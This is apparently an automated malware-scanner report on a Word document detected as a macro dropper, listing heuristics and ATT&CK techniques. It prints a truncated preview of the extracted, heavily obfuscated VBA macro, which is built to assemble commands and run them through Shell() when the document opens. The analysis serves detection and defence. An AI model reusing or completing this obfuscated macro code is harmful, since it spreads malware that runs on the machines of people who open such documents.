MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within its VBA macros. This suggests the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6459390-0' further supports this dropper functionality. The AutoOpen macro marker indicates it will execute automatically upon opening.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6459390-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6459390-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54024 bytes |
SHA-256: 7c12cfcf0b3afe108b79d6e1149d62c777d23c2e0e7cc1fbbcd591cbe9b7bba4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 27 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YUDhBCOSoTpYG" Function zjVJGLPjMEv() On Error Resume Next OkOtzPbwP = "IonrRdq% tes&&!%ITUIVJlQQCMlQ" PtOXcbi = kfvPFzumJJDucu = ADnjVMnN - sjcCGLq * 9146728 + CBool(1407496) - aEljr * Atn(3843032 + ChrB(QYwzRVVBVwOLNk) + ShXWXsjzSInaUN * 2872535) RUzMOhRk = wPavPQQa = HBkPbkt - dmEMVwCk * 5088304 + CBool(5692714) - ivAnGcSwnphB * Atn(3091357 + ChrB(JQqviqYtJraKIa) + XLoncvSG * 2596690) VrOBpoATl = (GRDHuwaVV) + hghbjJKfvkKs(OkOtzPbwP, 14, 12) AwubSjBFMK = "ckrjdnoHkfITJUwdNpes&&s=ajJlAijIrPaCOjaUpo" MviSI = OXabc = EHwNcqJNcjcQa - jsSVitPdwzviNd * 6604787 + CBool(5601492) - soSlqG * Atn(1803384 + ChrB(YLIFoUoGz) + VEEwjbbJ * 9277673) iRwSMjqkUOJ = wcjfzbjb = MslJwG - GXJfGYNJMYD * 9103721 + CBool(1011032) - JhKqZvidFMkNz * Atn(7541477 + ChrB(kvGqAVDzRM) + PXSbYoWQDL * 5115483) VPCHzGXO = (nJnGbvloPMj) + hghbjJKfvkKs(AwubSjBFMK, 19, 6) fuoYcm = "GipJuh%4rav% teYiTqQiTj" CMuKjQ = rSTfOMYnmldpGC = ZwtYQ - wWZzJLL * 3230569 + CBool(5705634) - JbcmiwIumdCDho * Atn(1840106 + ChrB(VGEVlw) + mtvujEANXJmTOd * 3185633) iLHAo = bpzmmIvpl = zqEMIMLjqsiEc - lQfuuVvjFjdfm * 2353000 + CBool(1721902) - wGJqEKIKBa * Atn(1533402 + ChrB(nXoWNJAVdAv) + uTlVjcaz * 4467965) lzZpNB = (ZKDdSzutY) + hghbjJKfvkKs(fuoYcm, 9, 9) BnVun = "iKfGkn3rav%!!%8rajtidVmhbjAEFo" mwSvz = EiipDlYq = jqOLVLwOBVaMf - ZmZXtQmGwiHzs * 9627090 + CBool(3998624) - BLXHiKaojJuGT * Atn(6729593 + ChrB(GZoECiOfZC) + skDVTAtHTP * 7953407) jOLmvJLr = MPMkqkVjn = CBaDtSP - fzEFRqkLpuMM * 2946083 + CBool(2455935) - BcppuYvE * Atn(4249793 + ChrB(dhCvPHbrjjsSG) + WzfubUazqkYbDc * 4005187) FQaYrK = (ucvllbHUt) + hghbjJKfvkKs(BnVun, 14, 11) ctrOdWWRUq = "jJJTwKTPTkRqzFTAjVHizlMl!%6rav%Z" fFUjIjzNS = iGhisqw = PjCpwwBXkEzJAi - pacDzrEaOszm * 1947752 + CBool(1963557) - rvATP * Atn(8056997 + ChrB(pkIbFukVwLwUsH) + nwFKJowA * 1955077) rFLivVzk = NhMBIhTwslsuW = JpstmpqRvbIB - EjIsjwk * 8468947 + CBool(2562451) - UqidXzWXt * Atn(5482379 + ChrB(BTwCOUBv) + ktHTOPksIvmu * 9292828) tJPUMq = (ksiPoIiPZ) + hghbjJKfvkKs(ctrOdWWRUq, 2, 7) ffLsKE = "bdpziShEmv%!!%7rav%!&&ljCUKkIwUkk" XOCLVqXCw = NGwAnCEr = bjmajYbiJJ - aTrMzANtk * 2293568 + CBool(4811259) - DiIXzTJvFLTNk * Atn(9259940 + ChrB(OlMMFMbstPkBmo) + HPCmjva * 229516) TjoXCz = KzOSOzicDD = IYzThblOIPSWGu - EKzMA * 7647536 + CBool(6920520) - BFwIiukHwip * Atn(593613 + ChrB(PiFHKMsMscI) + KvTiqDLYn * 9653882) jirGQ = (XDIMSSYEP) + hghbjJKfvkKs(ffLsKE, 11, 14) UKLRt = "NYapSQmaQGAv% tes&&pJ" VDXZkEs = ZqWSuzfcicFPW = ZMfEVOk - PVZALvEzujHi * 6459596 + CBool(7599207) - qsOuuYtKXMHt * Atn(4645831 + ChrB(uhRGob) + stmkY * 7166863) rjsXXm = YHsjmXpMGUq = VKCoDBf - zzqXsMozwbKW * 7626532 + CBool(2165652) - PUaHAThazQdF * Atn(8134243 + ChrB(FjiswiZRUnajr) + iJTXKZm * 3833638) uWuGHScNzcj = (jTHUXHToQ) + hghbjJKfvkKs(UKLRt, 2, 9) iJCSW = "tjQjfzSVtrdCKUTIPjCtriHudlZ%UbrWsuz" nbdcPh = FGYMDQ = PbzjQVRD - GEjMztZ * 3136123 + CBool(4075518) - Mhbwi * Atn(412775 + ChrB(UADmz) + mqWMRjvqKi * 250266) hCCXEmmKhA = aLlJLj = rDEjoc - iPBQAbGb * 8860358 + CBool(4189205) - jIjZKCwarH * Atn(8253063 + ChrB(LpWdIah) + ikAEfp * 8796384) znjNoC = (ufVSZtGPGzH) + hghbjJKfvkKs(iJCSW, 8, 1) DXMpLjqTY = "UVPNZWKfLjuwvnmsZQdSMSMsCbvjkTiQuCc=%7rav% owb" qjYXC = rawRLOUpLXo = UzubiDR - lCGFpC * 5671417 + CBool(8056287) - ZiudY * Atn(1848690 + ChrB(mwoKDEI) + FqtDPpwrqLvpT * 8267592) IijZCCd = Ikiompuhwo = pkOGFjuQzzJ - aLcqDRcUq * 9093195 + CBool(4323046) - aYPVBLIwPfA * Atn(2448254 + ChrB(kFOuDrcwKE) + JwqQUTttNi * 6191988) fKvQqHaa = (aAzRPjiYbSsC) + hghbjJKfvkKs(DXMpLjqTY, 4, 8) FTukrMQRic = "mCjprkvEEcQQaaljTrKtoNqquAzbGXp u" KzOQvNqiu = EzzIwOKV = SznVCjQf - nMTHbllAnBMdR * 1585627 + CBool(3347784) - oGqKDCCHvtULP * Atn(2236390 + ChrB(plYcavzXOW) + bIJoApWiNaZUrk * 1993858) jdzzIa = LhQakba = ssjrvricn - btzHtf * 801 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.